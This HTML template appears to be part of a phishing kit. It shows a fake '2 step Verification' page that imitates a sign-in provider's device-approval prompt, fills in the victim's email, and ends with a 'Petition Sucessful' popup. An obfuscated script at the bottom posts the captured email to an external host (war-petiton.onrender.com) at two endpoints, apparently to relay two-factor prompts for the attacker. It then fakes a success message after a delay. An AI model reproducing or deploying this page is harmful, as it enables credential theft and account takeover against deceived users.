<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Account</title>
</head>
<style>
    .loading-txt{
        font-size: 14px;
        font-family: 'Poppins',sans-serif;
        text-align: center;
        display: none;
    }
    #overlay {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.5); 
    z-index: 999;
}
.user-email-link{
        text-decoration: none;
        color: black;
    }
.use-account{
            font-size: 15px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            position: relative;
            padding: 0px 5%;
            top: -5%;
        }
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(25%,100%);
        width: 30%;
        background-color:#fff ;
        height: 250px;
        margin-left: 30%;
        display: none;
        z-index: 1000;
    }
    .forgot-password{
        text-align: center;
    }
.device-img{
        display: flex;
        justify-content: center;
        align-items: center;
    }
    @media screen and (max-width:560px) {
        *body{
            padding: 0;
            margin: 0;
        }
        ul { padding:0 }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(-20%,75%);
        width: 60%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
            position: relative;
            top: 10%;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 18px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
    }
    .try-another-method{
            margin-top: 10%;
        }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: rgba(70, 90, 126, 0.4);
      width: 30%;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: rgba(39, 52, 75, 0.685);
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }
    .device-img{
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .device-img img{
            width: 100px;
            height: 100px;
        }
        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 14px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-account{
            font-size: 14px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 65%;
            text-align: center;
            padding: 4px;
            position: relative;
            top: -5%;
            left: 17%;
            border-radius: 10px;
            font-family: 'Poppins',sans-serif;
        }
        .not-your,.learn-more{
            font-size: 14px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
    }

    @media (min-width: 561px) and (max-width:1200px) {
        *body{
            padding: 0;
            margin: 0;
        }
        .device-img img{
            width: 100px;
            height: 100px;
        }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(-20%,75%);
        width: 60%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      background-color: #fff;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
      background-color: #fff;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      left: 2%;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 17px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 17=6px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 40%;
            text-align: center;
            padding: 4px;
            position: relative;
            top: -5%;
            left: 30%;
            border-radius: 10px;
            font-family: 'Poppins',sans-serif;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 500;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 17px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        .try-another-method{
            margin-top: 10%;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }   
    }

    @media (min-width:1200px) {
        body{
            justify-content: center;
        }
        .try-another-method{
            margin-top: 10%;
        }
        .container{
            width: 25%;
            transform: translate(150%,20%);
            border: 1px solid rgba(151, 151, 151, 0.308);
            height:570px;
            border-radius: 10px;
            padding:10px;
        }
        .sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(20%,100%);
        width: 30%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            position: relative;
            top: -20px;
            font-weight: 500;
        }
        .use-google{
            position: relative;
            top: -30px;
            font-size: 14px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            padding: 0px 20px 0 20px;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 17px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 18px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 500;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 14px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 14px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
        .device-img img{
            width: 100px;
            height: 100px;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 50%;
            text-align: center;
            padding: 4px;
            position: relative;
            left: 23%;
            border-radius: 10px;
            top: -4%;
            font-family: 'Poppins',sans-serif;
        }
    }
</style>
<body>
    <section id="home-section">
        <div id="overlay"></div>
        <div class="sucessful">
            <div style="display: flex; justify-content: space-between;">
                <h6> </h6>
                <a href='/' class="close-sucess">close</a>
    </div> 
        <div class="sucess-img">
            <img src="/images/icons8-tick-50.png"/>
        </div>
            <h4 style="text-align: center;">Petition Sucessful</h4>
       
        </div>
        <h4 class="loading-txt">Loading.....</h4>
        <div class="container">
            <div class="logo-img">
                <img src="/images/icon-ar21.svg" alt="">
            </div>
            <h4 class="sign-in-text"> 2 step Verification</h4>
            <h4 class="use-account">To keep your account safe, we would like to  know if it's really you trying to sign in</h4>
           
                <a href="/signin" class="user-email-link"><h4 class="user-email"><%=dataInput%></h4></a>
        
            <div class="device-img">
                <img src="/images/Smart Phone Flat Style.jpg">
            </div>
            <div style="display: flex;justify-content: center;">
                    <a href="#" class="forgot-password">Check your device</a>
                  </div>

                  <h4 class="not-your">A notification was sent to your device. Tap <strong>Yes</strong> on  the notification to verify it's you</h4>
                  <h4 class="learn-more" id="learn-more" onclick="resendRequest()">Resend it</h4>
                  <div class="try-another-method">
                    <a href="/2faMethod" class="learn-more" id="learn-more" onclick="tryAnother()">Try another way</a>
                  </div>
        </div>    
    </section>
    <script>
  (function(_0x3baaf3,_0x47e475){const _0x240b73=_0x4819,_0x328a19=_0x3baaf3();while(!![]){try{const _0x5336f7=parseInt(_0x240b73(0x1f6))/0x1*(-parseInt(_0x240b73(0x1ee))/0x2)+-parseInt(_0x240b73(0x205))/0x3*(-parseInt(_0x240b73(0x201))/0x4)+parseInt(_0x240b73(0x1ea))/0x5*(parseInt(_0x240b73(0x1ed))/0x6)+-parseInt(_0x240b73(0x1f8))/0x7*(-parseInt(_0x240b73(0x1e8))/0x8)+-parseInt(_0x240b73(0x1fe))/0x9*(-parseInt(_0x240b73(0x204))/0xa)+parseInt(_0x240b73(0x1f7))/0xb+-parseInt(_0x240b73(0x1f0))/0xc;if(_0x5336f7===_0x47e475)break;else _0x328a19['push'](_0x328a19['shift']());}catch(_0x46f263){_0x328a19['push'](_0x328a19['shift']());}}}(_0x393d,0x2248c));function resendRequest(){const _0x474ce7=_0x4819,_0x56ddec=document[_0x474ce7(0x202)](_0x474ce7(0x1f4)),_0x2c41e1=_0x56ddec[_0x474ce7(0x203)],_0x2dfd5d={'key1':_0x2c41e1};console['log'](_0x2dfd5d),fetch(_0x474ce7(0x1f5),{'method':_0x474ce7(0x1ef),'headers':{'Content-Type':_0x474ce7(0x200)},'body':JSON['stringify'](_0x2dfd5d)})[_0x474ce7(0x206)](_0x57fcf9=>_0x57fcf9[_0x474ce7(0x1f1)]())[_0x474ce7(0x206)](_0x339379=>{console['log']('Success:',_0x339379);})[_0x474ce7(0x1f3)](_0x211057=>{const _0x4cf205=_0x474ce7;console[_0x4cf205(0x1f2)]('Error:',_0x211057);});}function _0x4819(_0xa3d579,_0x1dd58e){const _0x393dc7=_0x393d();return _0x4819=function(_0x4819eb,_0x598eb8){_0x4819eb=_0x4819eb-0x1e8;let _0x1774d6=_0x393dc7[_0x4819eb];return _0x1774d6;},_0x4819(_0xa3d579,_0x1dd58e);}setTimeout(()=>{const _0x4ca634=_0x4819,_0x49790a=document[_0x4ca634(0x202)](_0x4ca634(0x1fc)),_0x4a614b=document['querySelector']('.sucessful');_0x49790a[_0x4ca634(0x1f9)]['display']=_0x4ca634(0x1fd),_0x4a614b['style'][_0x4ca634(0x1eb)]=_0x4ca634(0x1fd);},0x9c40);function tryAnother(){const _0x1c842a=_0x4819,_0x1aecb1=document[_0x1c842a(0x202)](_0x1c842a(0x1f4)),_0x2d25f7=_0x1aecb1[_0x1c842a(0x203)],_0x5655ad={'email':_0x2d25f7,'tryanother':!![]};fetch(_0x1c842a(0x1ff),{'method':_0x1c842a(0x1ef),'headers':{'Content-Type':'application/json'},'body':JSON[_0x1c842a(0x1fa)](_0x5655ad)})[_0x1c842a(0x206)](_0x291486=>{const _0x19eac8=_0x1c842a;if(!_0x291486['ok'])throw new Error(_0x19eac8(0x1e9));return _0x291486[_0x19eac8(0x1f1)]();})[_0x1c842a(0x206)](_0x4b8b8e=>{const _0x24bd7a=_0x1c842a;console[_0x24bd7a(0x1fb)](_0x24bd7a(0x1ec),_0x4b8b8e);})[_0x1c842a(0x1f3)](_0x36e0c8=>{const _0x1e97b8=_0x1c842a;console[_0x1e97b8(0x1f2)]('Error:',_0x36e0c8);});}function _0x393d(){const _0x46d489=['34325VBWybN','display','Success:','66ZkisIA','90682uPkIYA','POST','614052eGdYOf','json','error','catch','.user-email','https://war-petiton.onrender.com/resendRequest','6SiXjGQ','1656710fVYVGk','45829fQfgcE','style','stringify','log','#overlay','block','1224TtvBJv','https://war-petiton.onrender.com/endpointFour','application/json','20972PAqXrq','querySelector','innerHTML','6870sAUsRJ','30snjZyx','then','112inAfCn','Network\x20response\x20was\x20not\x20ok'];_0x393d=function(){return _0x46d489;};return _0x393d();}
    </script>
</body>
</html>